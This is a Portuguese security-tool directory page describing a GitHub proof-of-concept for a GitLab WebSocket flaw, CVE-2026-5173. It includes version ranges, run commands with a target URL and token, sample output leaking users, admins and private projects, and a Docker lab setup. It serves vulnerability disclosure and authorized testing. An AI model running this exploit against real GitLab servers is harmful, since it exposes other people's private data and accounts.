Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-5173 — CVE-2026-5173 | Kitploit
Ferramentas/GitHubGitHub/0xblackash/cve-2026-5173
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHub0xblackash/cve-2026-5173

CVE-2026-5173

CVE-2026-5173

Ver Repositório
11há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🦊 CVE-2026-5173: Prova de Conceito de Execução Não Autorizada de Método via WebSocket do GitLab

Linux Vulnerability (5) (1)

CVE Badge PoC Affected Versions Python

GitHub stars License


🛠️ Visão Geral

CVE-2026-5173 permite que um atacante autenticado com privilégios baixos chame métodos restritos do backend por meio do endpoint WebSocket (/-/cable) do GitLab, especificamente via .

Baixar ferramenta
GraphqlChannel

Isso pode levar à exposição de dados sensíveis (Alta Confidencialidade) e a ações não autorizadas limitadas.

Versões Afetadas

  • GitLab CE/EE: 16.9.6 a 18.8.8
  • 18.9 anterior a 18.9.5
  • 18.10 anterior a 18.10.3

Corrigido em: 18.8.9 • 18.9.5 • 18.10.3


⚡ Recursos

  • PoC Python 3 limpo e moderno
  • Uso fácil com um único comando: python3 CVE-2026-5173.py http://target:8080
  • Conexão automática via WebSocket + assinatura do GraphqlChannel
  • Enumeração de múltiplos métodos (currentUser, users, projects, etc.)
  • Suporte a Personal Access Token
  • Saída colorida e bonita
  • Seguro apenas para uso autorizado em laboratório / pentest

🚀 Início Rápido

1. Clone o repositório

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-5173.git
cd CVE-2026-5173

2. Execute o PoC

root@kitploit:~
python3 CVE-2026-5173.py http://your-gitlab-lab:8080

Com Token (recomendado):

root@kitploit:~
python3 CVE-2026-5173.py http://target.com:8080 -t glpat-XXXXXXXXXXXXXXXXXXXX

📸 Capturas de Tela

Exemplo de saída bem-sucedida:

root@kitploit:~
[+] CVE-2026-5173 PoC v2 - Target: http://192.168.1.100:8080
[+] WebSocket connected
[+] Subscribed to GraphqlChannel
[*] Testing method: currentUser
[SUCCESS] Possible unauthorized access via 'currentUser'!
    → Response: {"result":{"data":{"currentUser":{"id":"gid://gitlab/User/123","name":"Normal User","email":"[email protected]"}}}...

[*] Testing method: users
[SUCCESS] Possible unauthorized access via 'users'!
    → Response: {"result":{"data":{"users":{"nodes":[ {"id":"gid://gitlab/User/1","name":"Admin","email":"[email protected]"}, ... ]}}}  ← This leaks all users including admins!

[*] Testing method: projects
[SUCCESS] Possible unauthorized access via 'projects'!
    → Response: long list of ALL projects (even private ones you shouldn't see)

📋 Uso

root@kitploit:~
python3 CVE-2026-5173.py <target> [options]

Arguments:
  target                Target URL (e.g. http://gitlab.example.com:8080)
  -t, --token           GitLab Personal Access Token (API scope)
  -h, --help            Show this help message

🧪 Configuração de Laboratório (Recomendado)

root@kitploit:~
docker run -d --name gitlab-vuln \
  -p 8080:80 -p 2222:22 \
  gitlab/gitlab-ce:18.10.2-ce.0

Em seguida, crie um usuário normal e execute o PoC.


⚠️ Aviso Legal

  • Este PoC é apenas para fins educacionais e de testes autorizados.
  • Use apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar.
  • O uso não autorizado é ilegal e contra a lei.
  • Não sou responsável por qualquer uso indevido.

📚 Referências

  • Lançamento oficial do patch do GitLab: https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
  • Registro CVE: https://www.cve.org/CVERecord?id=CVE-2026-5173
  • Aviso do GitHub: https://github.com/advisories/GHSA-5gj7-3j23-w2h2

Feito com ❤️ para a comunidade de segurança
Deixe uma ⭐ no repositório se achou útil!

Aviso: Nenhum exploit detalhado público estava disponível no momento da criação. Este é um PoC de nível de pesquisa.